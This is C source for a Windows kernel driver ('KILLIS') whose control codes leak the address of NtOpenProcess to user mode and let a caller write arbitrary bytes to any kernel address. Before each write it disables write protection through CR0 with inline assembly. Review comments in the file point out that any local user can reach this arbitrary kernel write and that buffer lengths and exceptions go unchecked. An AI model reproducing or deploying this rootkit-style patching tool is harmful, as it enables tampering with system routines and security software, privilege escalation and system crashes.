#include "ntddk.h"
#include "stdio.h"
/* Native device name and the DOS symbolic link user mode opens to reach it. */
#define NT_DEVICE_NAME L"\\Device\\KILLIS"
#define DOS_DEVICE_NAME L"\\DosDevices\\KILLIS"
/*
 * Control codes handled by DispatchDeviceControl. All four are
 * METHOD_BUFFERED (request data arrives in Irp->AssociatedIrp.SystemBuffer)
 * and FILE_ANY_ACCESS, so no particular access right on the device handle is
 * required to issue any of them.
 */
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)
/*
 * Win32-style integer aliases. DWORD is used below to carry a pointer value
 * (GetFunctionAddr), which only round-trips on 32-bit builds; the inline x86
 * asm in DispatchDeviceControl makes the same assumption. WORD and BOOL are
 * not used in this file.
 */
#define DWORD unsigned long
#define WORD unsigned short
#define BOOL unsigned long
/* Initialised in DriverEntry; the link name is reused by UnloadDriver. */
UNICODE_STRING DeviceNameString;
UNICODE_STRING LinkDeviceNameString;
/*
 * Resolve an exported kernel routine by name.
 *
 * FunctionName: NUL-terminated wide name of the routine to look up.
 * Returns: the routine's address cast to DWORD (unsigned long, see the
 *   #define above), or 0 when MmGetSystemRoutineAddress does not find the
 *   export. The cast is lossless only on 32-bit builds, which is also what
 *   the inline x86 asm elsewhere in this file assumes.
 */
DWORD GetFunctionAddr(IN PCWSTR FunctionName)
{
    UNICODE_STRING routineName;
    PVOID routine;

    RtlInitUnicodeString(&routineName, FunctionName);
    routine = MmGetSystemRoutineAddress(&routineName);
    return (DWORD)routine;
}
/*
 * Single dispatch routine for IRP_MJ_CREATE, IRP_MJ_CLOSE and
 * IRP_MJ_DEVICE_CONTROL (DriverEntry points all three major functions here).
 *
 * DeviceObject: unused.
 * Irp: the request; always completed here with IO_NO_INCREMENT.
 * Returns: Irp->IoStatus.Status, which is set to STATUS_SUCCESS at the top
 *   and never changed, so every path (unknown IOCTL, __except branch
 *   included) reports success to the caller.
 *
 * NOTE(review): the three INPUT* IOCTLs together let a caller copy a buffer
 * of caller-chosen length to a caller-chosen kernel address. None of the
 * SystemBuffer reads below checks
 * IrpStack->Parameters.DeviceIoControl.InputBufferLength, and neither the
 * target address nor the byte count is validated. Since the device is
 * created without a security descriptor (see DriverEntry) and the control
 * codes use FILE_ANY_ACCESS, this is an arbitrary kernel-memory write
 * reachable by any local user who can open \DosDevices\KILLIS; a bugcheck on
 * bad input is the benign outcome.
 */
NTSTATUS DispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    ULONG OutNtAddr;
    KIRQL oldIrql;
    NTSTATUS nStatus = STATUS_SUCCESS;
    ULONG IoControlCode = 0;
    PIO_STACK_LOCATION IrpStack = NULL;
    PUCHAR inBufByte = NULL;
    UCHAR outBuf[20]; /* decimal text of a 32-bit value: at most 10 digits plus NUL */
    /*
     * Statics: the target address and byte count survive across requests and
     * are shared by every handle to the device, so one caller's INPUTADDR /
     * INPUTBYTECOUNT feeds a later INPUTCODE from any caller.
     */
    static PUCHAR pCode;
    static ULONG KrnlAddr = 0;
    static ULONG KrnlByteCount = 0;
    ULONG i; /* Debug (unused) */

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0; /* never updated, even when output is produced */
    IrpStack = IoGetCurrentIrpStackLocation(Irp);
    switch (IrpStack->MajorFunction)
    {
    case IRP_MJ_CREATE:
        DbgPrint("IRP_MJ_CREATE 被调用\n");
        break;
    case IRP_MJ_CLOSE:
        DbgPrint("IRP_MJ_CLOSE 被调用\n");
        break;
    case IRP_MJ_DEVICE_CONTROL:
        DbgPrint("IRP_MJ_DEVICE_CONTROL 被调用\n");
        IoControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
        switch (IoControlCode)
        {
        case IOCTL_GETADDR_CONTROL:
            DbgPrint("IOCTL_GETADDR_CONTROL 被调用,通讯成功!\n");
            /*
             * Resolve NtOpenProcess and return its address to the caller as a
             * decimal string; this discloses a kernel address to user mode.
             * NOTE(review): the IOCTL is METHOD_BUFFERED, so output belongs in
             * SystemBuffer with Information set to its length. Instead the text
             * is strcpy'd straight into Irp->UserBuffer without probing it or
             * checking OutputBufferLength, and Information stays 0. "%ld" is
             * also paired with an unsigned value; "%lu" would match.
             */
            OutNtAddr = (DWORD)GetFunctionAddr(L"NtOpenProcess");
            sprintf(outBuf, "%ld", OutNtAddr);
            strcpy(Irp->UserBuffer, outBuf);
            break;
        case IOCTL_INPUTADDR_CONTROL:
            DbgPrint("IOCTL_INPUTADDR_CONTROL");
            /* Caller-supplied target address (BeginAddr), read as a ULONG
             * without checking that InputBufferLength >= sizeof(ULONG). */
            KrnlAddr = *((PULONG)Irp->AssociatedIrp.SystemBuffer);
            break;
        case IOCTL_INPUTBYTECOUNT_CONTROL:
            DbgPrint("IOCTL_INPUTBYTECOUNT_CONTROL");
            /* Caller-supplied byte count; same missing length check. */
            KrnlByteCount = *((PULONG)Irp->AssociatedIrp.SystemBuffer);
            break;
        case IOCTL_INPUTCODE_CONTROL:
            DbgPrint("IOCTL_INPUTCODE_CONTROL");
            /*
             * Caller-supplied bytes to be written into kernel memory at
             * KrnlAddr. KrnlByteCount, not InputBufferLength, decides how much
             * is copied, so the copy can also read past the end of
             * SystemBuffer.
             */
            inBufByte = (PUCHAR)Irp->AssociatedIrp.SystemBuffer;
            pCode = inBufByte;
            __try
            {
                /* Clear CR0.WP so writes to read-only kernel pages go through,
                 * with interrupts masked on this CPU only (x86-32 inline asm). */
                _asm
                {
                    PUSH EAX
                    CLI                 // disable interrupts
                    MOV EAX, CR0        // read CR0 into EAX
                    AND EAX, NOT 10000H // clear the WP bit
                    MOV CR0, EAX        // write CR0 back
                    POP EAX
                }
                oldIrql = KeRaiseIrqlToDpcLevel();
                RtlCopyMemory((PUCHAR)(KrnlAddr), pCode, sizeof(UCHAR) * KrnlByteCount);
                KeLowerIrql(oldIrql);
                /* Restore CR0.WP and re-enable interrupts. */
                _asm
                {
                    PUSH EAX
                    MOV EAX, CR0        // read CR0 into EAX
                    OR EAX, 10000H      // set the WP bit
                    MOV CR0, EAX        // write CR0 back
                    STI                 // enable interrupts
                    POP EAX
                }
            }
            __except(EXCEPTION_EXECUTE_HANDLER)
            {
                /*
                 * NOTE(review): should an exception reach this handler, WP is
                 * still cleared, interrupts are still masked and the IRQL has
                 * not been lowered; nothing restores them, and the IRP is still
                 * completed with STATUS_SUCCESS. In practice an invalid
                 * kernel address touched at DISPATCH_LEVEL most likely
                 * bugchecks rather than raising a catchable exception, so this
                 * handler offers little protection either way.
                 */
                break;
            }
            break;
        default:
            break;
        }
        break;
    default:
        DbgPrint("未知请求包调用");
        break;
    }
    nStatus = Irp->IoStatus.Status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return nStatus;
}
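/*
 * Driver unload callback: removes the DOS symbolic link and deletes the
 * single control device created in DriverEntry.
 *
 * DriverObject: the driver being unloaded; DriverObject->DeviceObject may be
 *   NULL if device creation never completed.
 *
 * Fix: the original evaluated ASSERT(!deviceObject->AttachedDevice) before
 * the NULL check, so a checked build would dereference a NULL device object.
 * The ASSERT now sits inside the guard. The IoDeleteSymbolicLink status is
 * ignored as before.
 */
VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject)
{
    PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;

    DbgPrint("Unload Driver Successfully.............");
    IoDeleteSymbolicLink(&LinkDeviceNameString);
    if (deviceObject != NULL) {
        /* Nothing is expected to be layered above this control device. */
        ASSERT(!deviceObject->AttachedDevice);
        IoDeleteDevice(deviceObject);
    }
}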
/*
 * Driver entry point: creates the control device, exposes it through a DOS
 * symbolic link and installs the dispatch and unload routines.
 *
 * theDriverObject: driver object supplied by the I/O manager.
 * RegistryPath: unused.
 * Returns: STATUS_SUCCESS, or the failure status of IoCreateDevice /
 *   IoCreateSymbolicLink (the device is deleted again in the latter case).
 *
 * NOTE(review): the device is created with IoCreateDevice and no security
 * descriptor, and every control code in this file is FILE_ANY_ACCESS, so
 * any local user able to open \DosDevices\KILLIS reaches
 * DispatchDeviceControl, including the IOCTLs that write kernel memory.
 * The device type FILE_DEVICE_DISK_FILE_SYSTEM used here also differs from
 * the FILE_DEVICE_UNKNOWN used in the CTL_CODE definitions.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT theDriverObject, PUNICODE_STRING RegistryPath)
{
    PDEVICE_OBJECT controlDevice = NULL;
    NTSTATUS status;

    /* Build the device and link names used here and in UnloadDriver. */
    RtlInitUnicodeString(&DeviceNameString, NT_DEVICE_NAME);
    RtlInitUnicodeString(&LinkDeviceNameString, DOS_DEVICE_NAME);

    status = IoCreateDevice(theDriverObject,
                            0,
                            &DeviceNameString,
                            FILE_DEVICE_DISK_FILE_SYSTEM,
                            FILE_DEVICE_SECURE_OPEN,
                            FALSE,
                            &controlDevice);
    if (!NT_SUCCESS(status)) {
        DbgPrint("DriverEntry: Error creating control device object, status=%08x\n", status);
        return status;
    }

    status = IoCreateSymbolicLink(&LinkDeviceNameString, &DeviceNameString);
    if (!NT_SUCCESS(status)) {
        IoDeleteDevice(controlDevice);
        return status;
    }

    /* One routine services create, close and device-control requests. */
    theDriverObject->MajorFunction[IRP_MJ_CREATE] = DispatchDeviceControl;
    theDriverObject->MajorFunction[IRP_MJ_CLOSE] = DispatchDeviceControl;
    theDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchDeviceControl;
    theDriverObject->DriverUnload = UnloadDriver;
    return STATUS_SUCCESS;
}